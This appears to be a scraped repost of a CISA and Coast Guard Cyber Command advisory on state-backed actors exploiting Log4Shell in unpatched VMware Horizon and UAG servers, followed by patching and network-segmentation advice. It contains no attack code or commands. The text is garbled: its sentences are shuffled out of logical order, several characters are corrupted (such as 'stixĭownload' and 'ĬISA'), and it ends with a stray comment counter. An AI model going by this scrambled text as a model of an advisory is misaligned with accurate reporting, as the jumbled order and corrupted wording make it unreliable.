Note: this advisory uses the MITRE ATT&CK for Enterprise framework, version 11.
Update July 18, 2022: MAR-10382580-2 stixĭownload the pdf version of this report: Technical Details. See the list below to download copies of IOCs: This Cybersecurity Advisory (CSA) has been updated with additional Malware Analysis Report MAR-10382580-2, which provides additional indicators of compromise (IOCs). If potential compromise is detected, administrators should apply the incident response recommendations included in this CSA and report key findings to CISA. The information is derived from two related incident response engagements and malware analysis of samples discovered on the victims’ networks.ĬISA and CGCYBER recommend all organizations with affected systems that did not immediately apply available patches or workarounds to assume compromise and initiate threat hunting activities using the IOCs provided in this CSA, Malware Analysis Report MAR-10382580-1, and MAR-10382254-1. This CSA provides the suspected APT actors’ tactics, techniques, and procedures (TTPs), information on the loader malware, and indicators of compromise (IOCs). 
In one confirmed compromise, these APT actors were able to move laterally inside the network, gain access to a disaster recovery network, and collect and exfiltrate sensitive data. As part of this exploitation, suspected APT actors implanted loader malware on compromised systems with embedded executables enabling remote command and control (C2). Since December 2021, multiple threat actor groups have exploited Log4Shell on unpatched, public-facing VMware Horizon and UAG servers. The Cybersecurity and Infrastructure Security Agency (CISA) and United States Coast Guard Cyber Command (CGCYBER) are releasing this joint Cybersecurity Advisory (CSA) to warn network defenders that cyber threat actors, including state-sponsored advanced persistent threat (APT) actors, have continued to exploit CVE-2021-44228 (Log4Shell) in VMware Horizon® and Unified Access Gateway (UAG) servers to obtain initial access to organizations that did not apply available patches or workarounds.
Minimize the internet-facing attack surface by hosting essential services on a segregated demilitarized (DMZ) zone, ensuring strict network perimeter access controls, and implementing regularly updated web application firewalls (WAFs) in front of public-facing services. 
If updates or workarounds were not promptly applied following VMware’s release of updates for Log4Shell in December 2021, treat all affected VMware systems as compromised.
Install fixed builds, updating all affected VMware Horizon and UAG systems to the latest versions.
0 kommentar(er)
